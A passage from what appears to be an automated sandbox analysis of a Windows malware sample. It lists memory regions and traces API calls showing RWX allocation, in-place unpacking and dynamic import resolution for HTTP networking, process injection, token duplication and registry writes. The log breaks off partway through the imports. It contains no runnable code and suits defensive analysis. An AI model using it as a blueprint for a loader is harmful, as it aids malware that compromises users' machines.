	            name = "private_0x0000000003c20000"
	        filename = ""

Region:
	              id = 4471
	        start_va = 0x3c20000
	          end_va = 0x3c36fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000003c20000"
	        filename = ""

Region:
	              id = 4472
	        start_va = 0x3c20000
	          end_va = 0x3c36fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000003c20000"
	        filename = ""

Region:
	              id = 4473
	        start_va = 0x3c20000
	          end_va = 0x3c36fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000003c20000"
	        filename = ""

Region:
	              id = 4474
	        start_va = 0x3c20000
	          end_va = 0x3c36fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000003c20000"
	        filename = ""

Region:
	              id = 4533
	        start_va = 0x3c20000
	          end_va = 0x3c36fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000003c20000"
	        filename = ""

Region:
	              id = 4534
	        start_va = 0x3c20000
	          end_va = 0x3c28fff
	     entry_point = 0x3c20000
	     region_type = mapped_file
	            name = "wininet.dll.mui"
	        filename = "\\Windows\\SysWOW64\\en-US\\wininet.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\wininet.dll.mui")

Region:
	              id = 4535
	        start_va = 0x3c30000
	          end_va = 0x3c46fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000003c30000"
	        filename = ""

Region:
	              id = 4536
	        start_va = 0x3c30000
	          end_va = 0x3c46fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000003c30000"
	        filename = ""

Region:
	              id = 4537
	        start_va = 0x3c30000
	          end_va = 0x3c46fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000003c30000"
	        filename = ""

Region:
	              id = 4538
	        start_va = 0x3c30000
	          end_va = 0x3c46fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000003c30000"
	        filename = ""

Region:
	              id = 4539
	        start_va = 0x3c30000
	          end_va = 0x3c47fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000003c30000"
	        filename = ""

Region:
	              id = 4542
	        start_va = 0x3c30000
	          end_va = 0x3c46fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000003c30000"
	        filename = ""

Region:
	              id = 4543
	        start_va = 0x3c30000
	          end_va = 0x3c46fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000003c30000"
	        filename = ""

Region:
	              id = 4544
	        start_va = 0x3c30000
	          end_va = 0x3c46fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000003c30000"
	        filename = ""

Region:
	              id = 4545
	        start_va = 0x3c30000
	          end_va = 0x3c46fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000003c30000"
	        filename = ""

Region:
	              id = 4546
	        start_va = 0x3c30000
	          end_va = 0x3c46fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000003c30000"
	        filename = ""


Thread:
	id = 89
	os_tid = 0x938

	[0087.729] GetEnvironmentVariableW (in: lpName="a杤畷獧汧晱摩湫p", lpBuffer=0x407c7d, nSize=0xb | out: lpBuffer="p") returned 0x0
	[0087.729] OpenSemaphoreW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="") returned 0x0
	[0087.729] GetModuleHandleA (lpModuleName="eappcfg.dll") returned 0x6ffa0000
	[0087.729] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x6ffa003c, lpBuffer=0x407ab4, nSize=0x4, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x407ab4*, lpNumberOfBytesRead=0x0) returned 1
	[0087.730] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x6ffa01a0, lpBuffer=0x407ab4, nSize=0xc, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x407ab4*, lpNumberOfBytesRead=0x0) returned 1
	[0087.730] SetErrorMode (uMode=0x0) returned 0x2
	[0087.730] VirtualAllocEx (hProcess=0xffffffff, lpAddress=0x0, dwSize=0x688, flAllocationType=0x1000, flProtect=0x40) returned 0x560000
	[0087.731] GetModuleHandleA (lpModuleName="Kernel32.dll") returned 0x765a0000
	[0087.760] GetProcAddress (hModule=0x765a0000, lpProcName="HeapAlloc") returned 0x77992bd0
	[0087.760] GetProcAddress (hModule=0x765a0000, lpProcName="HeapFree") returned 0x765b1ba0
	[0087.760] GetProcAddress (hModule=0x765a0000, lpProcName="GetTickCount") returned 0x765c5eb0
	[0087.760] VirtualAlloc (lpAddress=0x0, dwSize=0x688, flAllocationType=0x1000, flProtect=0x40) returned 0x570000
	[0087.761] VirtualAlloc (lpAddress=0x0, dwSize=0x32e00, flAllocationType=0x1000, flProtect=0x4) returned 0x590000
	[0087.768] VirtualProtect (in: lpAddress=0x400000, dwSize=0x400, flNewProtect=0x4, lpflOldProtect=0x19ff08 | out: lpflOldProtect=0x19ff08*=0x2) returned 1
	[0087.768] VirtualProtect (in: lpAddress=0x400000, dwSize=0x400, flNewProtect=0x2, lpflOldProtect=0x19ff08 | out: lpflOldProtect=0x19ff08*=0x4) returned 1
	[0087.768] VirtualProtect (in: lpAddress=0x401000, dwSize=0x22000, flNewProtect=0x4, lpflOldProtect=0x19fee8 | out: lpflOldProtect=0x19fee8*=0x80) returned 1
	[0087.784] VirtualProtect (in: lpAddress=0x401000, dwSize=0x22000, flNewProtect=0x20, lpflOldProtect=0x19fee8 | out: lpflOldProtect=0x19fee8*=0x4) returned 1
	[0087.784] VirtualProtect (in: lpAddress=0x423000, dwSize=0x2000, flNewProtect=0x4, lpflOldProtect=0x19fee8 | out: lpflOldProtect=0x19fee8*=0x8) returned 1
	[0087.784] VirtualProtect (in: lpAddress=0x423000, dwSize=0x2000, flNewProtect=0x2, lpflOldProtect=0x19fee8 | out: lpflOldProtect=0x19fee8*=0x4) returned 1
	[0087.784] VirtualProtect (in: lpAddress=0x425000, dwSize=0x11000, flNewProtect=0x4, lpflOldProtect=0x19fee8 | out: lpflOldProtect=0x19fee8*=0x8) returned 1
	[0087.786] VirtualProtect (in: lpAddress=0x425000, dwSize=0x11000, flNewProtect=0x4, lpflOldProtect=0x19fee8 | out: lpflOldProtect=0x19fee8*=0x4) returned 1
	[0087.787] VirtualProtect (in: lpAddress=0x436000, dwSize=0x1000, flNewProtect=0x4, lpflOldProtect=0x19fee8 | out: lpflOldProtect=0x19fee8*=0x8) returned 1
	[0087.787] VirtualProtect (in: lpAddress=0x436000, dwSize=0x1000, flNewProtect=0x2, lpflOldProtect=0x19fee8 | out: lpflOldProtect=0x19fee8*=0x4) returned 1
	[0087.787] VirtualProtect (in: lpAddress=0x437000, dwSize=0x1000, flNewProtect=0x4, lpflOldProtect=0x19fee8 | out: lpflOldProtect=0x19fee8*=0x8) returned 1
	[0087.787] VirtualProtect (in: lpAddress=0x437000, dwSize=0x1000, flNewProtect=0x2, lpflOldProtect=0x19fee8 | out: lpflOldProtect=0x19fee8*=0x4) returned 1
	[0087.787] GetModuleHandleA (lpModuleName="WININET.dll") returned 0x0
	[0087.787] LoadLibraryA (lpLibFileName="WININET.dll") returned 0x702b0000
	[0087.790] VirtualProtect (in: lpAddress=0x423318, dwSize=0x30, flNewProtect=0x4, lpflOldProtect=0x19fedc | out: lpflOldProtect=0x19fedc*=0x2) returned 1
	[0087.790] GetProcAddress (hModule=0x702b0000, lpProcName="HttpQueryInfoA") returned 0x70351880
	[0087.790] GetProcAddress (hModule=0x702b0000, lpProcName="InternetQueryOptionA") returned 0x70357d00
	[0087.790] GetProcAddress (hModule=0x702b0000, lpProcName="InternetSetOptionA") returned 0x70351dc0
	[0087.791] GetProcAddress (hModule=0x702b0000, lpProcName="HttpAddRequestHeadersA") returned 0x7032c3f0
	[0087.791] GetProcAddress (hModule=0x702b0000, lpProcName="InternetCloseHandle") returned 0x7037d200
	[0087.791] GetProcAddress (hModule=0x702b0000, lpProcName="HttpSendRequestA") returned 0x70378e60
	[0087.791] GetProcAddress (hModule=0x702b0000, lpProcName="InternetConnectA") returned 0x703f0da0
	[0087.791] GetProcAddress (hModule=0x702b0000, lpProcName="InternetReadFile") returned 0x70337320
	[0087.791] GetProcAddress (hModule=0x702b0000, lpProcName="HttpAddRequestHeadersW") returned 0x7032bec0
	[0087.791] GetProcAddress (hModule=0x702b0000, lpProcName="InternetOpenW") returned 0x70378490
	[0087.792] GetProcAddress (hModule=0x702b0000, lpProcName="HttpOpenRequestW") returned 0x70330fd0
	[0087.792] VirtualProtect (in: lpAddress=0x423318, dwSize=0x30, flNewProtect=0x2, lpflOldProtect=0x19fee4 | out: lpflOldProtect=0x19fee4*=0x4) returned 1
	[0087.792] GetModuleHandleA (lpModuleName="SHLWAPI.dll") returned 0x74b20000
	[0087.792] VirtualProtect (in: lpAddress=0x423284, dwSize=0x2c, flNewProtect=0x4, lpflOldProtect=0x19fedc | out: lpflOldProtect=0x19fedc*=0x2) returned 1
	[0087.792] GetProcAddress (hModule=0x74b20000, lpProcName="PathFindFileNameW") returned 0x74b37a50
	[0087.792] GetProcAddress (hModule=0x74b20000, lpProcName="StrCatW") returned 0x74b484a0
	[0087.792] GetProcAddress (hModule=0x74b20000, lpProcName="StrCpyW") returned 0x74b484e0
	[0087.792] GetProcAddress (hModule=0x74b20000, lpProcName="StrCmpIW") returned 0x74b34750
	[0087.792] GetProcAddress (hModule=0x74b20000, lpProcName="StrCpyNW") returned 0x74b433f0
	[0087.792] GetProcAddress (hModule=0x74b20000, lpProcName="StrStrA") returned 0x74b43570
	[0087.792] GetProcAddress (hModule=0x74b20000, lpProcName="StrDupW") returned 0x74b39060
	[0087.793] GetProcAddress (hModule=0x74b20000, lpProcName="StrStrIW") returned 0x74b381b0
	[0087.793] GetProcAddress (hModule=0x74b20000, lpProcName="StrRChrW") returned 0x74b3d1c0
	[0087.793] GetProcAddress (hModule=0x74b20000, lpProcName="StrCmpW") returned 0x74b35fe0
	[0087.793] VirtualProtect (in: lpAddress=0x423284, dwSize=0x2c, flNewProtect=0x2, lpflOldProtect=0x19fee4 | out: lpflOldProtect=0x19fee4*=0x4) returned 1
	[0087.793] GetModuleHandleA (lpModuleName="PSAPI.DLL") returned 0x0
	[0087.793] LoadLibraryA (lpLibFileName="PSAPI.DLL") returned 0x772c0000
	[0087.794] VirtualProtect (in: lpAddress=0x42326c, dwSize=0x8, flNewProtect=0x4, lpflOldProtect=0x19fedc | out: lpflOldProtect=0x19fedc*=0x2) returned 1
	[0087.794] GetProcAddress (hModule=0x772c0000, lpProcName="GetProcessImageFileNameA") returned 0x772c16a0
	[0087.794] VirtualProtect (in: lpAddress=0x42326c, dwSize=0x8, flNewProtect=0x2, lpflOldProtect=0x19fee4 | out: lpflOldProtect=0x19fee4*=0x4) returned 1
	[0087.794] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77960000
	[0087.794] VirtualProtect (in: lpAddress=0x423368, dwSize=0x14, flNewProtect=0x4, lpflOldProtect=0x19fedc | out: lpflOldProtect=0x19fedc*=0x2) returned 1
	[0087.794] GetProcAddress (hModule=0x77960000, lpProcName="_chkstk") returned 0x779da570
	[0087.795] GetProcAddress (hModule=0x77960000, lpProcName="RtlAllocateHeap") returned 0x77992bd0
	[0087.795] GetProcAddress (hModule=0x77960000, lpProcName="RtlFreeHeap") returned 0x77990230
	[0087.795] GetProcAddress (hModule=0x77960000, lpProcName="memset") returned 0x779dcfe0
	[0087.795] VirtualProtect (in: lpAddress=0x423368, dwSize=0x14, flNewProtect=0x2, lpflOldProtect=0x19fee4 | out: lpflOldProtect=0x19fee4*=0x4) returned 1
	[0087.795] GetModuleHandleA (lpModuleName="USERENV.dll") returned 0x0
	[0087.795] LoadLibraryA (lpLibFileName="USERENV.dll") returned 0x701e0000
	[0087.797] VirtualProtect (in: lpAddress=0x4232d8, dwSize=0x10, flNewProtect=0x4, lpflOldProtect=0x19fedc | out: lpflOldProtect=0x19fedc*=0x2) returned 1
	[0087.797] GetProcAddress (hModule=0x701e0000, lpProcName="CreateEnvironmentBlock") returned 0x701e4480
	[0087.797] GetProcAddress (hModule=0x701e0000, lpProcName="GetProfilesDirectoryW") returned 0x701e45a0
	[0087.797] GetProcAddress (hModule=0x701e0000, lpProcName="DestroyEnvironmentBlock") returned 0x701e4510
	[0087.797] VirtualProtect (in: lpAddress=0x4232d8, dwSize=0x10, flNewProtect=0x2, lpflOldProtect=0x19fee4 | out: lpflOldProtect=0x19fee4*=0x4) returned 1
	[0087.797] GetModuleHandleA (lpModuleName="WS2_32.dll") returned 0x746c0000
	[0087.797] VirtualProtect (in: lpAddress=0x423348, dwSize=0x20, flNewProtect=0x4, lpflOldProtect=0x19fedc | out: lpflOldProtect=0x19fedc*=0x2) returned 1
	[0087.797] GetProcAddress (hModule=0x746c0000, lpProcName=0x34) returned 0x746f1110
	[0087.797] GetProcAddress (hModule=0x746c0000, lpProcName=0x2) returned 0x746d3230
	[0087.798] GetProcAddress (hModule=0x746c0000, lpProcName=0x3) returned 0x746cead0
	[0087.798] GetProcAddress (hModule=0x746c0000, lpProcName=0xb) returned 0x746c5240
	[0087.798] GetProcAddress (hModule=0x746c0000, lpProcName=0x17) returned 0x746ce6b0
	[0087.798] GetProcAddress (hModule=0x746c0000, lpProcName=0xf) returned 0x746c4a90
	[0087.798] GetProcAddress (hModule=0x746c0000, lpProcName=0x73) returned 0x746c6520
	[0087.798] VirtualProtect (in: lpAddress=0x423348, dwSize=0x20, flNewProtect=0x2, lpflOldProtect=0x19fee4 | out: lpflOldProtect=0x19fee4*=0x4) returned 1
	[0087.798] GetModuleHandleA (lpModuleName="WINHTTP.dll") returned 0x0
	[0087.798] LoadLibraryA (lpLibFileName="WINHTTP.dll") returned 0x70210000
	[0087.800] VirtualProtect (in: lpAddress=0x4232e8, dwSize=0x30, flNewProtect=0x4, lpflOldProtect=0x19fedc | out: lpflOldProtect=0x19fedc*=0x2) returned 1
	[0087.800] GetProcAddress (hModule=0x70210000, lpProcName="WinHttpQueryDataAvailable") returned 0x702347a0
	[0087.800] GetProcAddress (hModule=0x70210000, lpProcName="WinHttpReceiveResponse") returned 0x7021c8e0
	[0087.800] GetProcAddress (hModule=0x70210000, lpProcName="WinHttpOpen") returned 0x70246720
	[0087.800] GetProcAddress (hModule=0x70210000, lpProcName="WinHttpAddRequestHeaders") returned 0x70229400
	[0087.801] GetProcAddress (hModule=0x70210000, lpProcName="WinHttpQueryHeaders") returned 0x702309c0
	[0087.801] GetProcAddress (hModule=0x70210000, lpProcName="WinHttpReadData") returned 0x70234ea0
	[0087.801] GetProcAddress (hModule=0x70210000, lpProcName="WinHttpOpenRequest") returned 0x70248dd0
	[0087.801] GetProcAddress (hModule=0x70210000, lpProcName="WinHttpSetOption") returned 0x702306f0
	[0087.801] GetProcAddress (hModule=0x70210000, lpProcName="WinHttpCloseHandle") returned 0x70233ad0
	[0087.801] GetProcAddress (hModule=0x70210000, lpProcName="WinHttpSendRequest") returned 0x7023bfd0
	[0087.801] GetProcAddress (hModule=0x70210000, lpProcName="WinHttpConnect") returned 0x70242880
	[0087.801] VirtualProtect (in: lpAddress=0x4232e8, dwSize=0x30, flNewProtect=0x2, lpflOldProtect=0x19fee4 | out: lpflOldProtect=0x19fee4*=0x4) returned 1
	[0087.801] GetModuleHandleA (lpModuleName="NETAPI32.dll") returned 0x0
	[0087.801] LoadLibraryA (lpLibFileName="NETAPI32.dll") returned 0x77490000
	[0087.803] VirtualProtect (in: lpAddress=0x423260, dwSize=0xc, flNewProtect=0x4, lpflOldProtect=0x19fedc | out: lpflOldProtect=0x19fedc*=0x2) returned 1
	[0087.803] GetProcAddress (hModule=0x77490000, lpProcName="NetApiBufferFree") returned 0x6ff916d0
	[0087.803] GetProcAddress (hModule=0x77490000, lpProcName="NetUserGetInfo") returned 0x6ff733a0
	[0087.805] VirtualProtect (in: lpAddress=0x423260, dwSize=0xc, flNewProtect=0x2, lpflOldProtect=0x19fee4 | out: lpflOldProtect=0x19fee4*=0x4) returned 1
	[0087.805] GetModuleHandleA (lpModuleName="KERNEL32.dll") returned 0x765a0000
	[0087.805] VirtualProtect (in: lpAddress=0x4230c8, dwSize=0x198, flNewProtect=0x4, lpflOldProtect=0x19fedc | out: lpflOldProtect=0x19fedc*=0x2) returned 1
	[0087.805] GetProcAddress (hModule=0x765a0000, lpProcName="VirtualProtectEx") returned 0x765e2790
	[0087.805] GetProcAddress (hModule=0x765a0000, lpProcName="VirtualAllocEx") returned 0x765e2730
	[0087.805] GetProcAddress (hModule=0x765a0000, lpProcName="IsBadReadPtr") returned 0x765b2510
	[0087.805] GetProcAddress (hModule=0x765a0000, lpProcName="GetCommandLineW") returned 0x765baba0
	[0087.805] GetProcAddress (hModule=0x765a0000, lpProcName="CreateMutexW") returned 0x765c66f0
	[0087.805] GetProcAddress (hModule=0x765a0000, lpProcName="CreateToolhelp32Snapshot") returned 0x765c7b50
	[0087.806] GetProcAddress (hModule=0x765a0000, lpProcName="Process32NextW") returned 0x765bd290
	[0087.806] GetProcAddress (hModule=0x765a0000, lpProcName="Process32FirstW") returned 0x765bf5a0
	[0087.806] GetProcAddress (hModule=0x765a0000, lpProcName="GetExitCodeThread") returned 0x765c4f40
	[0087.806] GetProcAddress (hModule=0x765a0000, lpProcName="WriteProcessMemory") returned 0x765e2850
	[0087.806] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalMemoryStatusEx") returned 0x765bafe0
	[0087.806] GetProcAddress (hModule=0x765a0000, lpProcName="OpenMutexW") returned 0x765c6770
	[0087.806] GetProcAddress (hModule=0x765a0000, lpProcName="MultiByteToWideChar") returned 0x765b2ad0
	[0087.806] GetProcAddress (hModule=0x765a0000, lpProcName="GetVersionExW") returned 0x765baa80
	[0087.807] GetProcAddress (hModule=0x765a0000, lpProcName="FormatMessageA") returned 0x765bf830
	[0087.807] GetProcAddress (hModule=0x765a0000, lpProcName="lstrcmpiA") returned 0x765b7830
	[0087.807] GetProcAddress (hModule=0x765a0000, lpProcName="GetFileAttributesW") returned 0x765c6a50
	[0087.807] GetProcAddress (hModule=0x765a0000, lpProcName="MoveFileExW") returned 0x765bb2b0
	[0087.807] GetProcAddress (hModule=0x765a0000, lpProcName="CopyFileW") returned 0x765c6ec0
	[0087.807] GetProcAddress (hModule=0x765a0000, lpProcName="lstrcmpW") returned 0x765b7970
	[0087.807] GetProcAddress (hModule=0x765a0000, lpProcName="lstrlenW") returned 0x765b3690
	[0087.807] GetProcAddress (hModule=0x765a0000, lpProcName="SetEnvironmentVariableA") returned 0x765e22f0
	[0087.807] GetProcAddress (hModule=0x765a0000, lpProcName="GetSystemInfo") returned 0x765ba0f0
	[0087.808] GetProcAddress (hModule=0x765a0000, lpProcName="TerminateThread") returned 0x765c0160
	[0087.808] GetProcAddress (hModule=0x765a0000, lpProcName="GetEnvironmentVariableA") returned 0x765ba8a0
	[0087.808] GetProcAddress (hModule=0x765a0000, lpProcName="GetFileTime") returned 0x765c6a90
	[0087.808] GetProcAddress (hModule=0x765a0000, lpProcName="GetSystemTime") returned 0x765c4940
	[0087.808] GetProcAddress (hModule=0x765a0000, lpProcName="SystemTimeToFileTime") returned 0x765c4c10
	[0087.808] GetProcAddress (hModule=0x765a0000, lpProcName="GetFileSize") returned 0x765c6a70
	[0087.808] GetProcAddress (hModule=0x765a0000, lpProcName="DeleteFileW") returned 0x765c68c0
	[0087.808] GetProcAddress (hModule=0x765a0000, lpProcName="FindClose") returned 0x765c68e0
	[0087.808] GetProcAddress (hModule=0x765a0000, lpProcName="SetEndOfFile") returned 0x765c6c00
	[0087.900] GetProcAddress (hModule=0x765a0000, lpProcName="SetFilePointer") returned 0x765c6c40
	[0087.900] GetProcAddress (hModule=0x765a0000, lpProcName="SetFileTime") returned 0x765c6c60
	[0087.900] GetProcAddress (hModule=0x765a0000, lpProcName="VirtualProtect") returned 0x765b7a50
	[0087.900] GetProcAddress (hModule=0x765a0000, lpProcName="HeapFree") returned 0x765b1ba0
	[0087.900] GetProcAddress (hModule=0x765a0000, lpProcName="GetCurrentProcess") returned 0x765b38c0
	[0087.900] GetProcAddress (hModule=0x765a0000, lpProcName="ExpandEnvironmentStringsW") returned 0x765bcd50
	[0087.900] GetProcAddress (hModule=0x765a0000, lpProcName="TerminateProcess") returned 0x765c5100
	[0087.900] GetProcAddress (hModule=0x765a0000, lpProcName="WaitForMultipleObjects") returned 0x765c6800
	[0087.901] GetProcAddress (hModule=0x765a0000, lpProcName="DeleteAtom") returned 0x765bcb20
	[0087.901] GetProcAddress (hModule=0x765a0000, lpProcName="lstrlenA") returned 0x765b8c80
	[0087.901] GetProcAddress (hModule=0x765a0000, lpProcName="WaitForSingleObject") returned 0x765c6820
	[0087.901] GetProcAddress (hModule=0x765a0000, lpProcName="ExitThread") returned 0x779c7a80
	[0087.901] GetProcAddress (hModule=0x765a0000, lpProcName="GetModuleHandleA") returned 0x765b99f0
	[0087.901] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalAddAtomW") returned 0x765b1be0
	[0087.901] GetProcAddress (hModule=0x765a0000, lpProcName="OpenProcess") returned 0x765b8bf0
	[0087.902] GetProcAddress (hModule=0x765a0000, lpProcName="ProcessIdToSessionId") returned 0x765b8fa0
	[0087.902] GetProcAddress (hModule=0x765a0000, lpProcName="Sleep") returned 0x765b7990
	[0087.902] GetProcAddress (hModule=0x765a0000, lpProcName="GetLastError") returned 0x765b3870
	[0087.902] GetProcAddress (hModule=0x765a0000, lpProcName="LoadLibraryA") returned 0x765c4bf0
	[0087.902] GetProcAddress (hModule=0x765a0000, lpProcName="CloseHandle") returned 0x765c6630
	[0087.902] GetProcAddress (hModule=0x765a0000, lpProcName="CreateThread") returned 0x765b9b90
	[0087.902] GetProcAddress (hModule=0x765a0000, lpProcName="HeapAlloc") returned 0x77992bd0
	[0087.902] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcAddress") returned 0x765b78b0
	[0087.902] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomW") returned 0x765b20f0
	[0087.903] GetProcAddress (hModule=0x765a0000, lpProcName="GetCurrentProcessId") returned 0x765b23e0
	[0087.903] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessHeap") returned 0x765b7710
	[0087.903] GetProcAddress (hModule=0x765a0000, lpProcName="CreateProcessW") returned 0x765bb000
	[0087.903] GetProcAddress (hModule=0x765a0000, lpProcName="GetModuleHandleW") returned 0x765b9bc0
	[0087.903] GetProcAddress (hModule=0x765a0000, lpProcName="FreeLibrary") returned 0x765b9f50
	[0087.903] GetProcAddress (hModule=0x765a0000, lpProcName="GetExitCodeProcess") returned 0x765bfdb0
	[0087.903] GetProcAddress (hModule=0x765a0000, lpProcName="GetSystemDirectoryW") returned 0x765b9fd0
	[0087.903] GetProcAddress (hModule=0x765a0000, lpProcName="OutputDebugStringA") returned 0x765bfde0
	[0087.904] GetProcAddress (hModule=0x765a0000, lpProcName="lstrcpyA") returned 0x765bea30
	[0087.904] GetProcAddress (hModule=0x765a0000, lpProcName="ExitProcess") returned 0x765c7b30
	[0087.904] GetProcAddress (hModule=0x765a0000, lpProcName="SetProcessPriorityBoost") returned 0x765bfef0
	[0087.904] GetProcAddress (hModule=0x765a0000, lpProcName="SetPriorityClass") returned 0x765b9e90
	[0087.904] GetProcAddress (hModule=0x765a0000, lpProcName="GetModuleFileNameW") returned 0x765b9b00
	[0087.904] GetProcAddress (hModule=0x765a0000, lpProcName="SetThreadPriority") returned 0x765b9990
	[0087.904] GetProcAddress (hModule=0x765a0000, lpProcName="GetEnvironmentVariableW") returned 0x765b9970
	[0087.904] GetProcAddress (hModule=0x765a0000, lpProcName="GetCurrentThread") returned 0x765b75f0
	[0087.904] GetProcAddress (hModule=0x765a0000, lpProcName="lstrcatW") returned 0x765dd170
	[0087.905] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalAlloc") returned 0x765b9950
	[0087.905] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFree") returned 0x765bccf0
	[0087.905] GetProcAddress (hModule=0x765a0000, lpProcName="LocalFree") returned 0x765b79a0
	[0087.905] GetProcAddress (hModule=0x765a0000, lpProcName="lstrcpyW") returned 0x765dd260
	[0087.905] GetProcAddress (hModule=0x765a0000, lpProcName="lstrcmpA") returned 0x765bcc30
	[0087.905] GetProcAddress (hModule=0x765a0000, lpProcName="ReadFile") returned 0x765c6bb0
	[0087.905] GetProcAddress (hModule=0x765a0000, lpProcName="SetEnvironmentVariableW") returned 0x765be9e0
	[0087.905] GetProcAddress (hModule=0x765a0000, lpProcName="GetTempPathW") returned 0x765c6b30
	[0087.906] GetProcAddress (hModule=0x765a0000, lpProcName="CreateFileW") returned 0x765c6890
	[0087.906] GetProcAddress (hModule=0x765a0000, lpProcName="GetTempFileNameW") returned 0x765c6b10
	[0087.906] GetProcAddress (hModule=0x765a0000, lpProcName="LocalAlloc") returned 0x765b7a30
	[0087.906] GetProcAddress (hModule=0x765a0000, lpProcName="HeapReAlloc") returned 0x7798efe0
	[0087.906] GetProcAddress (hModule=0x765a0000, lpProcName="VirtualFree") returned 0x765b7600
	[0087.906] GetProcAddress (hModule=0x765a0000, lpProcName="VirtualAlloc") returned 0x765b7810
	[0087.906] GetProcAddress (hModule=0x765a0000, lpProcName="RemoveDirectoryW") returned 0x765c6bf0
	[0087.906] GetProcAddress (hModule=0x765a0000, lpProcName="WriteFile") returned 0x765c6ca0
	[0087.906] GetProcAddress (hModule=0x765a0000, lpProcName="DuplicateHandle") returned 0x765c6640
	[0087.907] GetProcAddress (hModule=0x765a0000, lpProcName="DisconnectNamedPipe") returned 0x765e0990
	[0087.907] GetProcAddress (hModule=0x765a0000, lpProcName="FlushFileBuffers") returned 0x765c69b0
	[0087.907] GetProcAddress (hModule=0x765a0000, lpProcName="GetVersion") returned 0x765baaf0
	[0087.907] GetProcAddress (hModule=0x765a0000, lpProcName="CreateEventW") returned 0x765c66b0
	[0087.907] GetProcAddress (hModule=0x765a0000, lpProcName="GetComputerNameW") returned 0x765c46a0
	[0087.907] GetProcAddress (hModule=0x765a0000, lpProcName="WideCharToMultiByte") returned 0x765b3880
	[0087.907] GetProcAddress (hModule=0x765a0000, lpProcName="GetTickCount") returned 0x765c5eb0
	[0087.907] GetProcAddress (hModule=0x765a0000, lpProcName="GetComputerNameA") returned 0x765bfbf0
	[0087.907] GetProcAddress (hModule=0x765a0000, lpProcName="GetShortPathNameW") returned 0x765b2b90
	[0087.908] GetProcAddress (hModule=0x765a0000, lpProcName="FindFirstFileW") returned 0x765c6960
	[0087.908] GetProcAddress (hModule=0x765a0000, lpProcName="FindNextFileW") returned 0x765c69a0
	[0087.908] VirtualProtect (in: lpAddress=0x4230c8, dwSize=0x198, flNewProtect=0x2, lpflOldProtect=0x19fee4 | out: lpflOldProtect=0x19fee4*=0x4) returned 1
	[0087.908] GetModuleHandleA (lpModuleName="USER32.dll") returned 0x77810000
	[0087.908] VirtualProtect (in: lpAddress=0x4232b8, dwSize=0x20, flNewProtect=0x4, lpflOldProtect=0x19fedc | out: lpflOldProtect=0x19fedc*=0x2) returned 1
	[0087.908] GetProcAddress (hModule=0x77810000, lpProcName="wsprintfW") returned 0x7783f890
	[0087.908] GetProcAddress (hModule=0x77810000, lpProcName="wsprintfA") returned 0x778404a0
	[0087.908] GetProcAddress (hModule=0x77810000, lpProcName="ExitWindowsEx") returned 0x77879430
	[0087.908] GetProcAddress (hModule=0x77810000, lpProcName="GetShellWindow") returned 0x7782ff50
	[0087.909] GetProcAddress (hModule=0x77810000, lpProcName="GetForegroundWindow") returned 0x77848cb0
	[0087.909] GetProcAddress (hModule=0x77810000, lpProcName="TranslateMessage") returned 0x7782d9b0
	[0087.909] GetProcAddress (hModule=0x77810000, lpProcName="GetWindowThreadProcessId") returned 0x7782da50
	[0087.909] VirtualProtect (in: lpAddress=0x4232b8, dwSize=0x20, flNewProtect=0x2, lpflOldProtect=0x19fee4 | out: lpflOldProtect=0x19fee4*=0x4) returned 1
	[0087.909] GetModuleHandleA (lpModuleName="ADVAPI32.dll") returned 0x74aa0000
	[0087.909] VirtualProtect (in: lpAddress=0x423000, dwSize=0xc8, flNewProtect=0x4, lpflOldProtect=0x19fedc | out: lpflOldProtect=0x19fedc*=0x2) returned 1
	[0087.909] GetProcAddress (hModule=0x74aa0000, lpProcName="GetUserNameA") returned 0x74ac2910
	[0087.909] GetProcAddress (hModule=0x74aa0000, lpProcName="LookupAccountSidW") returned 0x74abf590
	[0087.909] GetProcAddress (hModule=0x74aa0000, lpProcName="DuplicateTokenEx") returned 0x74ac0ad0
	[0087.909] GetProcAddress (hModule=0x74aa0000, lpProcName="GetLengthSid") returned 0x74abf570
	[0087.910] GetProcAddress (hModule=0x74aa0000, lpProcName="CreateProcessAsUserW") returned 0x74ac2c10
	[0087.910] GetProcAddress (hModule=0x74aa0000, lpProcName="FreeSid") returned 0x74ac0440
	[0087.910] GetProcAddress (hModule=0x74aa0000, lpProcName="OpenProcessToken") returned 0x74abf520
	[0087.910] GetProcAddress (hModule=0x74aa0000, lpProcName="RegSetValueExA") returned 0x74ac0a20
	[0087.910] GetProcAddress (hModule=0x74aa0000, lpProcName="AllocateAndInitializeSid") returned 0x74abf660
	[0087.910] GetProcAddress (hModule=0x74aa0000, lpProcName="SetTokenInformation") returned 0x74ac3840
	[0087.910] GetProcAddress (hModule=0x74aa0000, lpProcName="RegOpenKeyA") returned 0x74ac09d0
	[0087.910] GetProcAddress (hModule=0x74aa0000, lpProcName="RegCloseKey") returned 0x74abf620
	[0087.910] GetProcAddress (hModule=0x74aa0000, lpProcName="ConvertSidToStringSidW") returned 0x74abf060
	[0087.911] GetProcAddress (hModule=0x74aa0000, lpProcName="LookupPrivilegeValueA") returned 0x74ad4dc0
